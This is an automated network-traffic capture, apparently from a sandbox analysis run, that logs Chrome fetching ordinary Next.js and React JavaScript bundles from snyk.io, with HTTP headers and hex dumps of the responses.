                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC4856INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 30 35 5d 2c 7b 34 35 37 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 28 36 38 31 30 37 29 7d 5d 29 7d 2c 31 31 32 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6c 3d 69 28 38 35 38 39 33 29 2c 6f 3d 69 28 35 31 35 32 29 2c 64 3d 69 2e 6e 28 6f 29 2c 61 3d 69 28 34 35 36 39 37 29 2c 74 3d 69 2e 6e 28 61 29 2c 72
                                                                                                                                                                                                                                                                                                              Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{45728:function(e,n,i){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return i(68107)}])},11223:function(e,n,i){"use strict";var l=i(85893),o=i(5152),d=i.n(o),a=i(45697),t=i.n(a),r


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              43192.168.2.54976323.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC524OUTGET /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_buildManifest.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"48ccb4d22af598db5f6d9a2c4497b92d"
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Oct 2024 14:26:39 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/Cp4abAN54CGUdTYwS0J62/_buildManifest.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::6wqhb-1729780037732-b7c482196f14
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:02 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 6607
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799342.1f60623
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC6607INData Raw: 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 65 2c 61 2c 74 2c 63 2c 69 2c 70 2c 6c 2c 75 2c 72 29 7b 72 65 74 75 72 6e 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 73 2c 65 2c 61 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 69 6e 64 65 78 2d 65 33 37 38 33 33 63 65 31 38 66 62 39 34 33 37 2e 6a 73 22 5d 2c 22 2f 34 30 34 22 3a 5b 73 2c 65 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 70 61 67 65 73 2f 34 30 34 2d 38 65 37 32 31 61 33 38 61 64 35 63 34 32 66 36 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: self.__BUILD_MANIFEST=function(s,e,a,t,c,i,p,l,u,r){return{__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":[s,e,a,"static/chunks/pages/index-e37833ce18fb9437.js"],"/404":[s,e,"static/chunks/pages/404-8e721a38ad5c42f6.js"],"/_error":["static/chun


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              44192.168.2.54976423.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC522OUTGET /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_ssgManifest.js"
                                                                                                                                                                                                                                                                                                              Content-Length: 738
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: "8606dd534193a9c6f42925ceab334554"
                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 24 Oct 2024 14:26:41 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/Cp4abAN54CGUdTYwS0J62/_ssgManifest.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::xhhrb-1729780037757-9ecab865bb5c
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:02 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799342.1f60657
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC738INData Raw: 73 65 6c 66 2e 5f 5f 53 53 47 5f 4d 41 4e 49 46 45 53 54 3d 6e 65 77 20 53 65 74 28 5b 22 5c 75 30 30 32 46 22 2c 22 5c 75 30 30 32 46 34 30 34 22 2c 22 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 61 70 70 73 65 63 6d 61 70 5c 75 30 30 32 46 73 68 61 72 65 22 2c 22 5c 75 30 30 32 46 61 72 74 69 63 6c 65 73 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 62 6c 6f 67 5c 75 30 30 32 46 5b 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 63 61 73 65 2d 73 74 75 64 69 65 73 5c 75 30 30 32 46 5b 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 63 6f 64 65 2d 63 68 65 63 6b 65 72 22 2c 22 5c 75 30 30 32 46 63 6f 64 65 2d 63 68 65 63 6b 65 72 5c 75 30 30 32 46 5b 2e 2e 2e 73 6c 75 67 5d 22 2c 22 5c 75 30 30 32 46 65 76 65 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: self.__SSG_MANIFEST=new Set(["\u002F","\u002F404","\u002F[...slug]","\u002Fappsecmap\u002Fshare","\u002Farticles\u002F[...slug]","\u002Fblog\u002F[slug]","\u002Fcase-studies\u002F[slug]","\u002Fcode-checker","\u002Fcode-checker\u002F[...slug]","\u002Feven


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              45192.168.2.54976623.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC380OUTGET /_next/static/chunks/framework-945b357d4a851f4b.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="framework-945b357d4a851f4b.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"3e0be0c20d8ec72d51721fa067bcf007"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/framework-945b357d4a851f4b.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::dr8bp-1729257049198-b3264c946735
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092dfe
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC15604INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 36 34 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 2c 6c 2c 61 2c 75 2c 6f 2c 69 2c 73 3d 74 28 36 37 32 39 34 29 2c 63 3d 74 28 36 33 38 34 30 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,n,t){var r,l,a,u,o,i,s=t(67294),c=t(63840);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t+
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8984INData Raw: 6e 61 74 65 3b 69 66 28 21 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 57 28 65 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 66 28 31 38 38 29 29 3b 72 65 74 75 72 6e 20 6e 21 3d 3d 65 3f 6e 75 6c 6c 3a 65 7d 66 6f 72 28 76 61 72 20 74 3d 65 2c 72 3d 6e 3b 3b 29 7b 76 61 72 20 6c 3d 74 2e 72 65 74 75 72 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 6c 29 62 72 65 61 6b 3b 76 61 72 20 61 3d 6c 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 61 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 72 3d 6c 2e 72 65 74 75 72 6e 29 29 7b 74 3d 72 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 69 66 28 6c 2e 63 68 69 6c 64 3d 3d 3d 61 2e 63 68 69 6c 64 29 7b 66 6f 72 28 61 3d 6c 2e 63 68 69 6c 64 3b 61 3b 29 7b 69 66 28 61 3d 3d 3d 74 29 72 65 74 75 72 6e 20 65
                                                                                                                                                                                                                                                                                                              Data Ascii: nate;if(!n){if(null===(n=eW(e)))throw Error(f(188));return n!==e?null:e}for(var t=e,r=n;;){var l=t.return;if(null===l)break;var a=l.alternate;if(null===a){if(null!==(r=l.return)){t=r;continue}break}if(l.child===a.child){for(a=l.child;a;){if(a===t)return e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC16384INData Raw: 30 30 30 30 35 32 41 34 0d 0a 74 72 6c 4b 65 79 3a 30 2c 73 68 69 66 74 4b 65 79 3a 30 2c 61 6c 74 4b 65 79 3a 30 2c 6d 65 74 61 4b 65 79 3a 30 2c 67 65 74 4d 6f 64 69 66 69 65 72 53 74 61 74 65 3a 74 6c 2c 62 75 74 74 6f 6e 3a 30 2c 62 75 74 74 6f 6e 73 3a 30 2c 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 3f 65 2e 66 72 6f 6d 45 6c 65 6d 65 6e 74 3d 3d 3d 65 2e 73 72 63 45 6c 65 6d 65 6e 74 3f 65 2e 74 6f 45 6c 65 6d 65 6e 74 3a 65 2e 66 72 6f 6d 45 6c 65 6d 65 6e 74 3a 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 7d 2c 6d 6f 76 65 6d 65 6e 74 58 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6d 6f 76 65 6d 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 000052A4trlKey:0,shiftKey:0,altKey:0,metaKey:0,getModifierState:tl,button:0,buttons:0,relatedTarget:function(e){return void 0===e.relatedTarget?e.fromElement===e.srcElement?e.toElement:e.fromElement:e.relatedTarget},movementX:function(e){return"movement
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC4784INData Raw: 29 7b 69 66 28 22 2f 24 22 3d 3d 3d 28 74 3d 6c 2e 64 61 74 61 29 29 7b 69 66 28 30 3d 3d 3d 72 29 7b 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6c 29 2c 6e 4d 28 6e 29 3b 72 65 74 75 72 6e 7d 72 2d 2d 7d 65 6c 73 65 22 24 22 21 3d 3d 74 26 26 22 24 3f 22 21 3d 3d 74 26 26 22 24 21 22 21 3d 3d 74 7c 7c 72 2b 2b 7d 74 3d 6c 7d 77 68 69 6c 65 28 74 29 3b 6e 4d 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 72 43 28 65 29 7b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7b 76 61 72 20 6e 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 31 3d 3d 3d 6e 7c 7c 33 3d 3d 3d 6e 29 62 72 65 61 6b 3b 69 66 28 38 3d 3d 3d 6e 29 7b 69 66 28 22 24 22 3d 3d 3d 28 6e 3d 65 2e 64 61 74 61 29 7c 7c 22 24 21 22 3d 3d 3d 6e 7c 7c 22 24 3f 22 3d 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: ){if("/$"===(t=l.data)){if(0===r){e.removeChild(l),nM(n);return}r--}else"$"!==t&&"$?"!==t&&"$!"!==t||r++}t=l}while(t);nM(n)}function rC(e){for(;null!=e;e=e.nextSibling){var n=e.nodeType;if(1===n||3===n)break;if(8===n){if("$"===(n=e.data)||"$!"===n||"$?"==
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 6c 65 74 69 6f 6e 73 29 3f 28 65 2e 64 65 6c 65 74 69 6f 6e 73 3d 5b 74 5d 2c 65 2e 66 6c 61 67 73 7c 3d 31 36 29 3a 6e 2e 70 75 73 68 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 6d 28 65 2c 6e 29 7b 73 77 69 74 63 68 28 65 2e 74 61 67 29 7b 63 61 73 65 20 35 3a 76 61 72 20 74 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 6e 3d 31 21 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 7c 7c 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 21 3d 3d 6e 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3f 6e 75 6c 6c 3a 6e 29 26 26 28 65 2e 73 74 61 74 65 4e 6f 64 65 3d 6e 2c 6c 73 3d 65 2c 6c 63 3d 72 43 28 6e 2e 66 69 72 73 74 43 68 69 6c 64 29 2c 21 30 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000eletions)?(e.deletions=[t],e.flags|=16):n.push(t)}function lm(e,n){switch(e.tag){case 5:var t=e.type;return null!==(n=1!==n.nodeType||t.toLowerCase()!==n.nodeName.toLowerCase()?null:n)&&(e.stateNode=n,ls=e,lc=rC(n.firstChild),!0);case 6:return n
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 74 61 74 65 3b 69 66 28 61 3d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: tate;if(a=
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 75 2e 64 65 73 74 72 6f 79 2c 6e 75 6c 6c 21 3d 3d 72 26 26 61 66 28 72 2c 75 2e 64 65 70 73 29 29 7b 6c 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 61 50 28 6e 2c 74 2c 61 2c 72 29 3b 72 65 74 75 72 6e 7d 7d 61 72 2e 66 6c 61 67 73 7c 3d 65 2c 6c 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 61 50 28 31 7c 6e 2c 74 2c 61 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 61 4c 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 61 7a 28 38 33 39 30 36 35 36 2c 38 2c 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 52 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 61 54 28 32 30 34 38 2c 38 2c 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 4d 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 61 54 28 34 2c 32 2c 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 46 28 65 2c 6e 29
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000u.destroy,null!==r&&af(r,u.deps)){l.memoizedState=aP(n,t,a,r);return}}ar.flags|=e,l.memoizedState=aP(1|n,t,a,r)}function aL(e,n){return az(8390656,8,e,n)}function aR(e,n){return aT(2048,8,e,n)}function aM(e,n){return aT(4,2,e,n)}function aF(e,n)
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 72 65 6e 7d 3b 72 65 74 75 72 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ren};retur
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 6e 20 30 3d 3d 28 31 26 6f 29 26 26 6e 2e 63 68 69 6c 64 21 3d 3d 61 3f 28 28 6c 3d 6e 2e 63 68 69 6c 64 29 2e 63 68 69 6c 64 4c 61 6e 65 73 3d 30 2c 6c 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 3d 69 2c 6e 2e 64 65 6c 65 74 69 6f 6e 73 3d 6e 75 6c 6c 29 3a 28 6c 3d 6f 4b 28 61 2c 69 29 29 2e 73 75 62 74 72 65 65 46 6c 61 67 73 3d 31 34 36 38 30 30 36 34 26 61 2e 73 75 62 74 72 65 65 46 6c 61 67 73 2c 6e 75 6c 6c 21 3d 3d 72 3f 75 3d 6f 4b 28 72 2c 75 29 3a 28 75 3d 6f 58 28 75 2c 6f 2c 74 2c 6e 75 6c 6c 29 2c 75 2e 66 6c 61 67 73 7c 3d 32 29 2c 75 2e 72 65 74 75 72 6e 3d 6e 2c 6c 2e 72 65 74 75 72 6e 3d 6e 2c 6c 2e 73 69 62 6c 69 6e 67 3d 75 2c 6e 2e 63 68 69 6c 64 3d 6c 2c 6c 3d 75 2c 75 3d 6e 2e 63 68 69 6c 64 2c 6f 3d 6e 75
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000n 0==(1&o)&&n.child!==a?((l=n.child).childLanes=0,l.pendingProps=i,n.deletions=null):(l=oK(a,i)).subtreeFlags=14680064&a.subtreeFlags,null!==r?u=oK(r,u):(u=oX(u,o,t,null),u.flags|=2),u.return=n,l.return=n,l.sibling=u,n.child=l,l=u,u=n.child,o=nu
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC8204INData Raw: 2c 61 29 29 2c 31 3d 3d 3d 6e 29 29 74 68 72 6f 77 20 74 3d 75 37 2c 6f 54 28 65 2c 30 29 2c 6f 5f 28 65 2c 72 29 2c 6f 77 28 65 2c 65 4a 28 29 29 2c 74 3b 73 77 69 74 63 68 28 65 2e 66 69 6e 69 73 68 65 64 57 6f 72 6b 3d 6c 2c 65 2e 66 69 6e 69 73 68 65 64 4c 61 6e 65 73 3d 72 2c 6e 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 66 28 33 34 35 29 29 3b 63 61 73 65 20 32 3a 63 61 73 65 20 35 3a 6f 49 28 65 2c 6f 6c 2c 6f 6f 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 69 66 28 6f 5f 28 65 2c 72 29 2c 28 31 33 30 30 32 33 34 32 34 26 72 29 3d 3d 3d 72 26 26 31 30 3c 28 6e 3d 6f 61 2b 35 30 30 2d 65 4a 28 29 29 29 7b 69 66 28 30 21 3d 3d 6e 6c 28 65 2c 30 29 29 62 72 65 61 6b 3b 69 66 28 28 28 6c 3d 65 2e 73 75 73 70 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ,a)),1===n))throw t=u7,oT(e,0),o_(e,r),ow(e,eJ()),t;switch(e.finishedWork=l,e.finishedLanes=r,n){case 0:case 1:throw Error(f(345));case 2:case 5:oI(e,ol,oo);break;case 3:if(o_(e,r),(130023424&r)===r&&10<(n=oa+500-eJ())){if(0!==nl(e,0))break;if(((l=e.suspe


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              46192.168.2.54976823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC375OUTGET /_next/static/chunks/main-51ef5c3c654b7f9c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="main-51ef5c3c654b7f9c.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"766dbcdf4793cc32bb4726ce1a4eeb42"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/main-51ef5c3c654b7f9c.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::pxgx2-1729257049228-ca204325e783
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
